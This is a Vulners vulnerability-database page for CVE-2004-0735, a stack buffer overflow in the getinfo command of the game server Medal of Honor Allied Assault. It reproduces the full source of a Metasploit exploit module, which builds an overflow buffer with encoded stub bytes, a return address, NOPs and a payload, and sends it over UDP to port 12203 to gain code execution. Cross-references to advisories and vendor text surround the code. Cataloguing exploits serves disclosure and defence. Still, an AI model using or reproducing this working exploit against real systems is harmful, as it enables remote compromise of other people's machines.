Vulners
Lucene search
Medal Of Honor Allied Assault getinfo Stack Overflow
🗓️ 26 Nov 2009 00:00:00Reported by Jacopo CerviniType 
packetstorm🔗 packetstormsecurity.com👁 35 Views
| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
 | CVE-2004-0735 | 9 May 201000:00 | – | circl |
 | CVE-2004-0735 | 23 Jul 200404:00 | – | cve |
 | CVE-2004-0735 | 23 Jul 200404:00 | – | cvelist |
 | Medal of Honor Allied Assault - getinfo Stack Buffer Overflow (Metasploit) | 9 May 201000:00 | – | exploitdb |
 | Medal of Honor Multiple Remote Overflows | 10 Aug 200400:00 | – | nessus |
 | Medal of Honor Allied Assault getinfo Stack Buffer Overflow | 7 Oct 200812:03 | – | metasploit |
 | CVE-2004-0735 | 27 Jul 200404:00 | – | nvd |
`##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => 'Medal Of Honor Allied Assault getinfo Stack Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in the getinfo
command of Medal Of Honor Allied Assault.
},
'Author' => [ 'Jacopo Cervini' ],
'License' => BSD_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2004-0735'],
[ 'OSVDB', '8061' ],
[ 'URL', 'http://www.milw0rm.com/exploits/357'],
[ 'BID', '10743'],
],
'Privileged' => false,
'Payload' =>
{
'Space' => 512,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
['Medal Of Honor Allied Assault v 1.0 Universal', { 'Rets' => [ 111, 0x406957 ] }], # call ebx
],
'DisclosureDate' => 'Jul 17 2004',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(12203)
], self.class)
end
def exploit
connect_udp
# We should convert this to metasm - Patrick
buf = 'B' * target['Rets'][0]
buf << "\x68\x76\x76\x76\x76"*9 # PUSH 76767676 x 9
buf << "\x68\x7f\x7f\x7f\x7f" # PUSH 7F7F7F7F
buf << "\x57" # PUSH EDI
buf << "\x58" # POP EAX
buf << "\x32\x64\x24\x24" # XOR AH,BYTE PTR SS:[ESP+24]
buf << "\x32\x24\x24" # XOR AH,BYTE PTR SS:[ESP]
buf << "\x48"*150 # DEC EAX x 150
buf << "\x50\x50" # PUSH EAX x 2
buf << "\x53" # PUSH EBX
buf << "\x58" # POP EAX
buf << "\x51" # PUSH ECX
buf << "\x32\x24\x24" # XOR AH,BYTE PTR SS:[ESP]
buf << "\x6a\x7f" # PUSH 7F
buf << "\x5e" # POP ESI
buf << "\x46"*37 # INC ESI
buf << "\x56"*10 # PUSH ESI
buf << "\x32\x44\x24\x24" # XOR AL,BYTE PTR SS:[ESP+24]
buf << "\x49\x49" # DEC ECX
buf << "\x31\x48\x34" # XOR DWORD PTR DS:[EAX+34],ECX
buf << "\x58"*11 # POP EAX
buf << "\x42"*66
buf << "\x3c"*4
buf << "\x42"*48
buf << [ target['Rets'][1] ].pack('V')
req = "\xff\xff\xff\xff\x02" + "getinfo " + buf
req << "\r\n\r\n" + make_nops(32) + payload.encoded
udp_sock.put(req)
handler
disconnect_udp
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Nov 2009 00:00Current
0.6Low risk
Vulners AI Score0.6
EPSS0.79643